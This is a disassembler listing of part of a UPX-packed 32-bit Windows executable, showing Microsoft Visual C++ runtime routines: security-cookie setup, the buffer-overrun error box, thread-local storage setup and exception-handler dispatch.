; =============== S U B R O U T I N E =======================================
sub_41ACE0 proc near ; CODE XREF: sub_4191E5+6�j
; UPX0:0041AD06�p
cmp dword ptr [ecx+8], 0
mov dword ptr [ecx], offset off_425000
jz short locret_41ACF5
push dword ptr [ecx+4]
call sub_419DDD
pop ecx
locret_41ACF5: ; CODE XREF: sub_41ACE0+A�j
retn
sub_41ACE0 endp
; =============== S U B R O U T I N E =======================================
sub_41ACF6 proc near ; DATA XREF: UPX0:00424F04�o
; UPX0:00425004�o
mov eax, [ecx+4]
test eax, eax
jnz short locret_41AD02
mov eax, offset aUnknownExcepti ; "Unknown exception"
locret_41AD02: ; CODE XREF: sub_41ACF6+5�j
retn
sub_41ACF6 endp
; ---------------------------------------------------------------------------
loc_41AD03: ; DATA XREF: UPX0:off_425000�o
push esi
mov esi, ecx
call sub_41ACE0
test byte ptr [esp+8], 1
jz short loc_41AD19
push esi
call sub_41930D
pop ecx
loc_41AD19: ; CODE XREF: UPX0:0041AD10�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AD1F proc near ; DATA XREF: UPX0:00428004�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
mov eax, dword_42A290
test eax, eax
jz short loc_41AD35
cmp eax, 0BB40E64Eh
jnz short locret_41AD83
loc_41AD35: ; CODE XREF: sub_41AD1F+D�j
push esi
lea eax, [ebp+var_8]
push eax
call dword_424194 ; GetSystemTimeAsFileTime
mov esi, [ebp+var_4]
xor esi, [ebp+var_8]
call dword_4240CC ; GetCurrentProcessId
xor esi, eax
call dword_4240B8 ; GetCurrentThreadId
xor esi, eax
call dword_4240E4 ; GetTickCount
xor esi, eax
lea eax, [ebp+var_10]
push eax
call dword_4241B4 ; QueryPerformanceCounter
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor esi, eax
mov dword_42A290, esi
jnz short loc_41AD82
mov dword_42A290, 0BB40E64Eh
loc_41AD82: ; CODE XREF: sub_41AD1F+57�j
pop esi
locret_41AD83: ; CODE XREF: sub_41AD1F+14�j
leave
retn
sub_41AD1F endp
; ---------------------------------------------------------------------------
loc_41AD85: ; CODE XREF: sub_419224+75�p
push 118h
push offset stru_425208
call __SEH_prolog
mov eax, dword_42A290
mov [ebp-1Ch], eax
mov eax, dword_44BEC8
xor ecx, ecx
cmp eax, ecx
jz short loc_41ADC6
mov [ebp-4], ecx
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call eax
pop ecx
pop ecx
loc_41ADB4: ; CODE XREF: UPX0:0041ADC4�j
or dword ptr [ebp-4], 0FFFFFFFFh
jmp loc_41AEC5
; ---------------------------------------------------------------------------
loc_41ADBD: ; DATA XREF: UPX0:stru_425208�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41ADC1: ; DATA XREF: UPX0:stru_425208�o
mov esp, [ebp-18h]
jmp short loc_41ADB4
; ---------------------------------------------------------------------------
loc_41ADC6: ; CODE XREF: UPX0:0041ADA5�j
mov eax, [ebp+8]
dec eax
jz short loc_41ADE2
mov edi, offset aUnknownSecurit ; "Unknown security failure detected!"
mov dword ptr [ebp-128h], offset aASecurityError ; "A security error of unknown cause has b"...
mov esi, 0D4h
jmp short loc_41ADF6
; ---------------------------------------------------------------------------
loc_41ADE2: ; CODE XREF: UPX0:0041ADCA�j
mov edi, offset aBufferOverrunD ; "Buffer overrun detected!"
mov dword ptr [ebp-128h], offset aABufferOverrun ; "A buffer overrun has been detected whic"...
mov esi, 0B9h
loc_41ADF6: ; CODE XREF: UPX0:0041ADE0�j
mov [ebp-20h], cl
push 104h
lea eax, [ebp-124h]
push eax
push ecx
call dword_4241B8 ; GetModuleFileNameA
test eax, eax
jnz short loc_41AE23
push offset aProgramNameUnk ; "<program name unknown>"
lea eax, [ebp-124h]
push eax
call sub_41BFB0
pop ecx
pop ecx
loc_41AE23: ; CODE XREF: UPX0:0041AE0E�j
lea ebx, [ebp-124h]
mov eax, ebx
push eax
call sub_41FAB0
pop ecx
add eax, 0Bh
cmp eax, 3Ch
jbe short loc_41AE5F
mov eax, ebx
push eax
call sub_41FAB0
mov ebx, eax
lea eax, [ebp-124h]
sub eax, 31h
add ebx, eax
push 3
push offset a___ ; "..."
push ebx
call sub_4198C0
add esp, 10h
loc_41AE5F: ; CODE XREF: UPX0:0041AE38�j
push ebx
call sub_41FAB0
pop ecx
lea eax, [eax+esi+0Ch]
add eax, 3
and eax, 0FFFFFFFCh
call sub_4192D0
mov [ebp-18h], esp
mov esi, esp
push edi
push esi
call sub_41BFB0
mov edi, offset asc_425050 ; "\n\n"
push edi
push esi
call sub_41BFC0
push offset aProgram ; "Program: "
push esi
call sub_41BFC0
push ebx
push esi
call sub_41BFC0
push edi
push esi
call sub_41BFC0
push dword ptr [ebp-128h]
push esi
call sub_41BFC0
push 12010h
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push esi
call sub_42067F
add esp, 3Ch
loc_41AEC5: ; CODE XREF: UPX0:0041ADB8�j
push 3
call sub_41EB71
; ---------------------------------------------------------------------------
db 4 dup(0CCh)
; [0000003B BYTES: COLLAPSED FUNCTION __SEH_prolog. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __SEH_epilog. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AF24 proc near ; DATA XREF: __SEH_prolog�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_41AFED
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
push ebx
call sub_420778
add esp, 4
or eax, eax
jz short loc_41AFDF
loc_41AF64: ; CODE XREF: sub_41AF24+B2�j
cmp esi, 0FFFFFFFFh
jz short loc_41AFE6
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4+4]
or eax, eax
jz short loc_41AFCD
push esi
push ebp
lea ebp, [ebx+10h]
xor ebx, ebx
xor ecx, ecx
xor edx, edx
xor esi, esi
xor edi, edi
call eax
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_41AFCD
js short loc_41AFD8
mov edi, [ebx+8]
push ebx
call sub_419758
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_41979A
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_41982E
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
mov eax, [edi+ecx*4+8]
xor ebx, ebx
xor ecx, ecx
xor edx, edx
xor esi, esi
xor edi, edi
call eax
loc_41AFCD: ; CODE XREF: sub_41AF24+4E�j
; sub_41AF24+68�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_41AF64
; ---------------------------------------------------------------------------
loc_41AFD8: ; CODE XREF: sub_41AF24+6A�j
mov eax, 0
jmp short loc_41B002
; ---------------------------------------------------------------------------
loc_41AFDF: ; CODE XREF: sub_41AF24+3E�j
mov eax, [ebp+arg_0]
or dword ptr [eax+4], 8
loc_41AFE6: ; CODE XREF: sub_41AF24+43�j
mov eax, 1
jmp short loc_41B002
; ---------------------------------------------------------------------------
loc_41AFED: ; CODE XREF: sub_41AF24+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_41979A
add esp, 8
pop ebp
mov eax, 1
loc_41B002: ; CODE XREF: sub_41AF24+B9�j
; sub_41AF24+C7�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41AF24 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_41979A
add esp, 8
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B025 proc near ; CODE XREF: sub_419312+3E�p
; sub_419312+4C�p
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
cmp dword ptr [esi+14h], 0
push edi
jz loc_41B0D9
cmp dword ptr [esi+24h], 0
jz short loc_41B04B
cmp ebx, 7Fh
jbe loc_41B0D9
loc_41B04B: ; CODE XREF: sub_41B025+1B�j
xor edi, edi
inc edi
cmp ebx, 100h
jnb short loc_41B075
cmp [esi+28h], edi
jle short loc_41B068
push edi
push ebx
push esi
call sub_41CEE8
add esp, 0Ch
jmp short loc_41B071
; ---------------------------------------------------------------------------
loc_41B068: ; CODE XREF: sub_41B025+34�j
mov eax, [esi+48h]
movzx eax, byte ptr [eax+ebx*2]
and eax, edi
loc_41B071: ; CODE XREF: sub_41B025+41�j
test eax, eax
jz short loc_41B0E6
loc_41B075: ; CODE XREF: sub_41B025+2F�j
mov edx, [esi+48h]
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_41B096
push 2
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
mov byte ptr [ebp+arg_0+2], 0
pop eax
jmp short loc_41B09F
; ---------------------------------------------------------------------------
loc_41B096: ; CODE XREF: sub_41B025+60�j
mov byte ptr [ebp+arg_0], bl
mov byte ptr [ebp+arg_0+1], 0
mov eax, edi
loc_41B09F: ; CODE XREF: sub_41B025+6F�j
push edi
push dword ptr [esi+4]
lea ecx, [ebp+var_4]
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push 100h
push dword ptr [esi+14h]
call sub_41C18B
add esp, 20h
test eax, eax
jz short loc_41B0E6
cmp eax, edi
jnz short loc_41B0CC
movzx eax, [ebp+var_4]
jmp short loc_41B0E8
; ---------------------------------------------------------------------------
loc_41B0CC: ; CODE XREF: sub_41B025+9F�j
movzx ecx, [ebp+var_3]
xor eax, eax
mov ah, [ebp+var_4]
or eax, ecx
jmp short loc_41B0E8
; ---------------------------------------------------------------------------
loc_41B0D9: ; CODE XREF: sub_41B025+11�j
; sub_41B025+20�j
cmp ebx, 41h
jl short loc_41B0E6
cmp ebx, 5Ah
lea eax, [ebx+20h]
jle short loc_41B0E8
loc_41B0E6: ; CODE XREF: sub_41B025+4E�j
; sub_41B025+9B�j ...
mov eax, ebx
loc_41B0E8: ; CODE XREF: sub_41B025+A5�j
; sub_41B025+B2�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41B025 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B0F0 proc near ; CODE XREF: sub_419312+28�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
mov al, 0FFh
mov edi, edi
loc_41B100: ; CODE XREF: sub_41B0F0+20�j
; sub_41B0F0+40�j
or al, al
jz short loc_41B136
mov al, [esi]
add esi, 1
mov ah, [edi]
add edi, 1
cmp ah, al
jz short loc_41B100
sub al, 41h
cmp al, 1Ah
sbb cl, cl
and cl, 20h
add al, cl
add al, 41h
xchg ah, al
sub al, 41h
cmp al, 1Ah
sbb cl, cl
and cl, 20h
add al, cl
add al, 41h
cmp al, ah
jz short loc_41B100
sbb al, al
sbb al, 0FFh
loc_41B136: ; CODE XREF: sub_41B0F0+12�j
movsx eax, al
pop ebx
pop esi
pop edi
leave
retn
sub_41B0F0 endp
; =============== S U B R O U T I N E =======================================
sub_41B13E proc near ; CODE XREF: sub_41B20E+B6�p
; sub_41B3A1+10F�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+3Ch]
push edi
xor edi, edi
cmp eax, dword_44C234
jz short loc_41B1B4
cmp eax, edi
jz short loc_41B1B4
mov eax, [esi+2Ch]
cmp [eax], edi
jnz short loc_41B1B4
mov eax, [esi+34h]
cmp eax, edi
jz short loc_41B17F
cmp [eax], edi
jnz short loc_41B17F
cmp eax, ds:dword_47C624
jz short loc_41B17F
push eax
call sub_419DDD
push dword ptr [esi+3Ch]
call sub_420B90
pop ecx
pop ecx
loc_41B17F: ; CODE XREF: sub_41B13E+23�j
; sub_41B13E+27�j ...
mov eax, [esi+30h]
cmp eax, edi
jz short loc_41B1A2
cmp [eax], edi
jnz short loc_41B1A2
cmp eax, ds:dword_47C628
jz short loc_41B1A2
push eax
call sub_419DDD
push dword ptr [esi+3Ch]
call sub_420B31
pop ecx
pop ecx
loc_41B1A2: ; CODE XREF: sub_41B13E+46�j
; sub_41B13E+4A�j ...
push dword ptr [esi+2Ch]
call sub_419DDD
push dword ptr [esi+3Ch]
call sub_419DDD
pop ecx
pop ecx
loc_41B1B4: ; CODE XREF: sub_41B13E+11�j
; sub_41B13E+15�j ...
mov eax, [esi+40h]
cmp eax, ds:dword_47C620
jz short loc_41B1DD
cmp eax, edi
jz short loc_41B1DD
cmp [eax], edi
jnz short loc_41B1DD
push eax
call sub_419DDD
mov eax, [esi+44h]
sub eax, 0FEh
push eax
call sub_419DDD
pop ecx
pop ecx
loc_41B1DD: ; CODE XREF: sub_41B13E+7F�j
; sub_41B13E+83�j ...
mov eax, [esi+50h]
cmp eax, dword_44C230
jz short loc_41B204
cmp eax, edi
jz short loc_41B204
cmp [eax+0B4h], edi
jnz short loc_41B204
push eax
call sub_4209A1
push dword ptr [esi+50h]
call sub_419DDD
pop ecx
pop ecx
loc_41B204: ; CODE XREF: sub_41B13E+A8�j
; sub_41B13E+AC�j ...
push esi
call sub_419DDD
pop ecx
pop edi
pop esi
retn
sub_41B13E endp
; =============== S U B R O U T I N E =======================================
sub_41B20E proc near ; CODE XREF: sub_41B2CF+18�p
push esi
call sub_41B330
mov esi, eax
mov ecx, [esi+64h]
cmp ecx, off_42A5CC
jz loc_41B2CA
xor edx, edx
cmp ecx, edx
jz short loc_41B25A
mov eax, [ecx+2Ch]
dec dword ptr [ecx]
cmp eax, edx
jz short loc_41B236
dec dword ptr [eax]
loc_41B236: ; CODE XREF: sub_41B20E+24�j
mov eax, [ecx+34h]
cmp eax, edx
jz short loc_41B23F
dec dword ptr [eax]
loc_41B23F: ; CODE XREF: sub_41B20E+2D�j
mov eax, [ecx+30h]
cmp eax, edx
jz short loc_41B248
dec dword ptr [eax]
loc_41B248: ; CODE XREF: sub_41B20E+36�j
mov eax, [ecx+40h]
cmp eax, edx
jz short loc_41B251
dec dword ptr [eax]
loc_41B251: ; CODE XREF: sub_41B20E+3F�j
mov eax, [ecx+4Ch]
dec dword ptr [eax+0B4h]
loc_41B25A: ; CODE XREF: sub_41B20E+1B�j
mov eax, off_42A5CC
mov [esi+64h], eax
mov eax, off_42A5CC
inc dword ptr [eax]
mov eax, off_42A5CC
cmp [eax+2Ch], edx
jz short loc_41B27D
mov eax, [eax+2Ch]
inc dword ptr [eax]
mov eax, off_42A5CC
loc_41B27D: ; CODE XREF: sub_41B20E+63�j
cmp [eax+34h], edx
jz short loc_41B28C
mov eax, [eax+34h]
inc dword ptr [eax]
mov eax, off_42A5CC
loc_41B28C: ; CODE XREF: sub_41B20E+72�j
cmp [eax+30h], edx
jz short loc_41B29B
mov eax, [eax+30h]
inc dword ptr [eax]
mov eax, off_42A5CC
loc_41B29B: ; CODE XREF: sub_41B20E+81�j
cmp [eax+40h], edx
jz short loc_41B2AA
mov eax, [eax+40h]
inc dword ptr [eax]
mov eax, off_42A5CC
loc_41B2AA: ; CODE XREF: sub_41B20E+90�j
mov eax, [eax+4Ch]
inc dword ptr [eax+0B4h]
cmp ecx, edx
jz short loc_41B2CA
cmp [ecx], edx
jnz short loc_41B2CA
cmp ecx, offset dword_42A578
jz short loc_41B2CA
push ecx
call sub_41B13E
pop ecx
loc_41B2CA: ; CODE XREF: sub_41B20E+11�j
; sub_41B20E+A7�j ...
mov eax, [esi+64h]
pop esi
retn
sub_41B20E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B2CF proc near ; CODE XREF: sub_419312+15�p
; sub_419A76+24�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_425398
call __SEH_prolog
push 0Ch
call sub_41D0E7
pop ecx
and [ebp+ms_exc.disabled], 0
call sub_41B20E
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41B301
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_41B2CF endp
; =============== S U B R O U T I N E =======================================
sub_41B301 proc near ; CODE XREF: sub_41B2CF+24�p
; DATA XREF: UPX0:stru_425398�o
push 0Ch
call sub_41D032
pop ecx
retn
sub_41B301 endp
; =============== S U B R O U T I N E =======================================
sub_41B30A proc near ; CODE XREF: sub_41B4E8+94�p
; DATA XREF: sub_41B4E8+80�o ...
call dword_4241BC ; TlsAlloc
retn 4
sub_41B30A endp
; =============== S U B R O U T I N E =======================================
sub_41B313 proc near ; CODE XREF: sub_41B4E8+9�p
; sub_41B4E8:loc_41B5CD�p
mov eax, dword_42A704
cmp eax, 0FFFFFFFFh
jz short loc_41B32B
push eax
call dword_44BEE4 ; TlsFree
or dword_42A704, 0FFFFFFFFh
loc_41B32B: ; CODE XREF: sub_41B313+8�j
jmp sub_41CFDD
sub_41B313 endp
; =============== S U B R O U T I N E =======================================
sub_41B330 proc near ; CODE XREF: sub_419312+5�p
; sub_419475+8D�p ...
push ebx
push esi
call dword_42412C ; RtlGetLastWin32Error
push dword_42A704
mov ebx, eax
call dword_44BEDC ; TlsGetValue
mov esi, eax
test esi, esi
jnz short loc_41B395
push 8Ch
push 1
call sub_420529
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_41B38D
push esi
push dword_42A704
call dword_44BEE0 ; TlsSetValue
test eax, eax
jz short loc_41B38D
mov dword ptr [esi+54h], offset dword_42AA58
mov dword ptr [esi+14h], 1
call dword_4240B8 ; GetCurrentThreadId
or dword ptr [esi+4], 0FFFFFFFFh
mov [esi], eax
jmp short loc_41B395
; ---------------------------------------------------------------------------
loc_41B38D: ; CODE XREF: sub_41B330+2E�j
; sub_41B330+3F�j
push 10h
call sub_41A4AE
pop ecx
loc_41B395: ; CODE XREF: sub_41B330+1A�j
; sub_41B330+5B�j
push ebx
call dword_4241C0 ; RtlRestoreLastWin32Error
mov eax, esi
pop esi
pop ebx
retn
sub_41B330 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B3A1 proc near ; DATA XREF: sub_41B4E8:loc_41B577�o
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 10h
push offset stru_4253A8
call __SEH_prolog
mov esi, [ebp+arg_0]
xor edi, edi
cmp esi, edi
jz loc_41B4C6
mov eax, [esi+24h]
cmp eax, edi
jz short loc_41B3C8
push eax
call sub_419DDD
pop ecx
loc_41B3C8: ; CODE XREF: sub_41B3A1+1E�j
mov eax, [esi+2Ch]
cmp eax, edi
jz short loc_41B3D6
push eax
call sub_419DDD
pop ecx
loc_41B3D6: ; CODE XREF: sub_41B3A1+2C�j
mov eax, [esi+34h]
cmp eax, edi
jz short loc_41B3E4
push eax
call sub_419DDD
pop ecx
loc_41B3E4: ; CODE XREF: sub_41B3A1+3A�j
mov eax, [esi+3Ch]
cmp eax, edi
jz short loc_41B3F2
push eax
call sub_419DDD
pop ecx
loc_41B3F2: ; CODE XREF: sub_41B3A1+48�j
mov eax, [esi+44h]
cmp eax, edi
jz short loc_41B400
push eax
call sub_419DDD
pop ecx
loc_41B400: ; CODE XREF: sub_41B3A1+56�j
mov eax, [esi+48h]
cmp eax, edi
jz short loc_41B40E
push eax
call sub_419DDD
pop ecx
loc_41B40E: ; CODE XREF: sub_41B3A1+64�j
mov eax, [esi+54h]
cmp eax, offset dword_42AA58
jz short loc_41B41F
push eax
call sub_419DDD
pop ecx
loc_41B41F: ; CODE XREF: sub_41B3A1+75�j
push 0Dh
call sub_41D0E7
pop ecx
mov [ebp+ms_exc.disabled], edi
mov eax, [esi+60h]
mov [ebp+var_1C], eax
cmp eax, edi
jz short loc_41B447
dec dword ptr [eax]
jnz short loc_41B447
cmp eax, ds:dword_47C3DC
jz short loc_41B447
push eax
call sub_419DDD
pop ecx
loc_41B447: ; CODE XREF: sub_41B3A1+91�j
; sub_41B3A1+95�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41B4D3
push 0Ch
call sub_41D0E7
pop ecx
mov [ebp+ms_exc.disabled], 1
mov eax, [esi+64h]
mov [ebp+var_20], eax
cmp eax, edi
jz short loc_41B4B6
dec dword ptr [eax]
cmp [eax+2Ch], edi
jz short loc_41B475
mov ecx, [eax+2Ch]
dec dword ptr [ecx]
loc_41B475: ; CODE XREF: sub_41B3A1+CD�j
cmp [eax+34h], edi
jz short loc_41B47F
mov ecx, [eax+34h]
dec dword ptr [ecx]
loc_41B47F: ; CODE XREF: sub_41B3A1+D7�j
cmp [eax+30h], edi
jz short loc_41B489
mov ecx, [eax+30h]
dec dword ptr [ecx]
loc_41B489: ; CODE XREF: sub_41B3A1+E1�j
cmp [eax+40h], edi
jz short loc_41B493
mov ecx, [eax+40h]
dec dword ptr [ecx]
loc_41B493: ; CODE XREF: sub_41B3A1+EB�j
mov ecx, [eax+4Ch]
dec dword ptr [ecx+0B4h]
cmp eax, off_42A5CC
jz short loc_41B4B6
cmp eax, offset dword_42A578
jz short loc_41B4B6
cmp [eax], edi
jnz short loc_41B4B6
push eax
call sub_41B13E
pop ecx
loc_41B4B6: ; CODE XREF: sub_41B3A1+C6�j
; sub_41B3A1+101�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41B4DF
push esi
call sub_419DDD
pop ecx
loc_41B4C6: ; CODE XREF: sub_41B3A1+13�j
call __SEH_epilog
retn 4
sub_41B3A1 endp
; =============== S U B R O U T I N E =======================================
sub_41B4CE proc near ; DATA XREF: UPX0:stru_4253A8�o
xor edi, edi
mov esi, [ebp+8]
sub_41B4CE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41B4D3 proc near ; CODE XREF: sub_41B3A1+AA�p
push 0Dh
call sub_41D032
pop ecx
retn
sub_41B4D3 endp
; =============== S U B R O U T I N E =======================================
sub_41B4DC proc near ; DATA XREF: UPX0:004253BC�o
mov esi, [ebp+8]
sub_41B4DC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41B4DF proc near ; CODE XREF: sub_41B3A1+119�p
push 0Ch
call sub_41D032
pop ecx
retn
sub_41B4DF endp
; =============== S U B R O U T I N E =======================================
sub_41B4E8 proc near ; CODE XREF: start:loc_41A5D2�p
call sub_41CF94
test eax, eax
jnz short loc_41B4F9
call sub_41B313
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41B4F9: ; CODE XREF: sub_41B4E8+7�j
push esi
push edi
push offset aKernel32_dll ; "kernel32.dll"
call dword_424130 ; GetModuleHandleA
mov edi, eax
test edi, edi
jz short loc_41B577
mov esi, dword_424100
push offset aFlsalloc ; "FlsAlloc"
push edi
call esi ; GetProcAddress
push offset aFlsgetvalue ; "FlsGetValue"
push edi
mov off_44BED8, eax
call esi ; GetProcAddress
push offset aFlssetvalue ; "FlsSetValue"
push edi
mov dword_44BEDC, eax
call esi ; GetProcAddress
push offset aFlsfree ; "FlsFree"
push edi
mov dword_44BEE0, eax
call esi ; GetProcAddress
cmp dword_44BEDC, 0
mov dword_44BEE4, eax
jnz short loc_41B577
mov eax, dword_4241CC
mov dword_44BEDC, eax
mov eax, dword_4241C8
mov dword_44BEE0, eax
mov eax, dword_4241C4
mov off_44BED8, offset sub_41B30A
mov dword_44BEE4, eax
loc_41B577: ; CODE XREF: sub_41B4E8+22�j
; sub_41B4E8+65�j
push offset sub_41B3A1
call off_44BED8
cmp eax, 0FFFFFFFFh
mov dword_42A704, eax
jz short loc_41B5CD
xor edi, edi
push 8Ch
inc edi
push edi
call sub_420529
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_41B5CD
push esi
push dword_42A704
call dword_44BEE0 ; TlsSetValue
test eax, eax
jz short loc_41B5CD
mov dword ptr [esi+54h], offset dword_42AA58
mov [esi+14h], edi
call dword_4240B8 ; GetCurrentThreadId
or dword ptr [esi+4], 0FFFFFFFFh
mov [esi], eax
mov eax, edi
jmp short loc_41B5D4
; ---------------------------------------------------------------------------
loc_41B5CD: ; CODE XREF: sub_41B4E8+A2�j
; sub_41B4E8+B8�j ...
call sub_41B313
xor eax, eax
loc_41B5D4: ; CODE XREF: sub_41B4E8+E3�j
pop edi
pop esi
retn
sub_41B4E8 endp
; =============== S U B R O U T I N E =======================================
sub_41B5D7 proc near ; CODE XREF: sub_41BBDB+15D�p
arg_0 = dword ptr 4
mov eax, [esi+4]
test eax, eax
jz short loc_41B622
lea edx, [eax+8]
cmp byte ptr [edx], 0
jz short loc_41B622
mov ecx, [edi+4]
cmp eax, ecx
jz short loc_41B5FD
add ecx, 8
push ecx
push edx
call sub_41EC90
test eax, eax
pop ecx
pop ecx
jnz short loc_41B61F
loc_41B5FD: ; CODE XREF: sub_41B5D7+14�j
test byte ptr [edi], 2
jz short loc_41B607
test byte ptr [esi], 8
jz short loc_41B61F
loc_41B607: ; CODE XREF: sub_41B5D7+29�j
mov eax, [esp+arg_0]
mov eax, [eax]
test al, 1
jz short loc_41B616
test byte ptr [esi], 1
jz short loc_41B61F
loc_41B616: ; CODE XREF: sub_41B5D7+38�j
test al, 2
jz short loc_41B622
test byte ptr [esi], 2
jnz short loc_41B622
loc_41B61F: ; CODE XREF: sub_41B5D7+24�j
; sub_41B5D7+2E�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41B622: ; CODE XREF: sub_41B5D7+5�j
; sub_41B5D7+D�j ...
xor eax, eax
inc eax
retn
sub_41B5D7 endp
; =============== S U B R O U T I N E =======================================
sub_41B626 proc near ; CODE XREF: sub_41B644+76�p
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jz short loc_41B633
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41B633: ; CODE XREF: sub_41B626+8�j
call sub_41B330
and dword ptr [eax+84h], 0
jmp sub_41BE81
sub_41B626 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B644 proc near ; CODE XREF: sub_41B776+129�p
; sub_41BAB6+31�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 10h
push offset stru_425400
call __SEH_prolog
mov ebx, [ebp+arg_0]
mov esi, [ebx+8]
mov [ebp+var_1C], esi
call sub_41B330
add eax, 84h
inc dword ptr [eax]
and [ebp+ms_exc.disabled], 0
mov edi, [ebp+arg_8]
loc_41B66C: ; CODE XREF: sub_41B644+8F�j
cmp esi, [ebp+arg_C]
jz short loc_41B6D5
cmp esi, 0FFFFFFFFh
jle short loc_41B67B
cmp esi, [edi+4]
jl short loc_41B680
loc_41B67B: ; CODE XREF: sub_41B644+30�j
call sub_41BEB6
loc_41B680: ; CODE XREF: sub_41B644+35�j
mov eax, esi
shl eax, 3
mov ecx, [edi+8]
add ecx, eax
mov esi, [ecx]
mov [ebp+var_20], esi
mov [ebp+ms_exc.disabled], 1
cmp dword ptr [ecx+4], 0
jz short loc_41B6B1
mov [ebx+8], esi
push 103h
push ebx
mov ecx, [edi+8]
push dword ptr [ecx+eax+4]
call sub_41BEF0
loc_41B6B1: ; CODE XREF: sub_41B644+56�j
and [ebp+ms_exc.disabled], 0
jmp short loc_41B6D0
; ---------------------------------------------------------------------------
loc_41B6B7: ; DATA XREF: UPX0:00425410�o
mov eax, [ebp+ms_exc.exc_ptr]
call sub_41B626
retn
; ---------------------------------------------------------------------------
loc_41B6C0: ; DATA XREF: UPX0:00425414�o
mov esp, [ebp+ms_exc.old_esp]
and [ebp+ms_exc.disabled], 0
mov edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov esi, [ebp+var_20]
loc_41B6D0: ; CODE XREF: sub_41B644+71�j
mov [ebp+var_1C], esi
jmp short loc_41B66C
; ---------------------------------------------------------------------------
loc_41B6D5: ; CODE XREF: sub_41B644+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41B6F7
cmp esi, [ebp+arg_C]
jz short loc_41B6E8
call sub_41BEB6
loc_41B6E8: ; CODE XREF: sub_41B644+9D�j
mov [ebx+8], esi
call __SEH_epilog
retn
sub_41B644 endp
; =============== S U B R O U T I N E =======================================
sub_41B6F1 proc near ; DATA XREF: UPX0:stru_425400�o
mov ebx, [ebp+8]
mov esi, [ebp-1Ch]
sub_41B6F1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41B6F7 proc near ; CODE XREF: sub_41B644+95�p
call sub_41B330
cmp dword ptr [eax+84h], 0
jle short locret_41B711
call sub_41B330
add eax, 84h
dec dword ptr [eax]
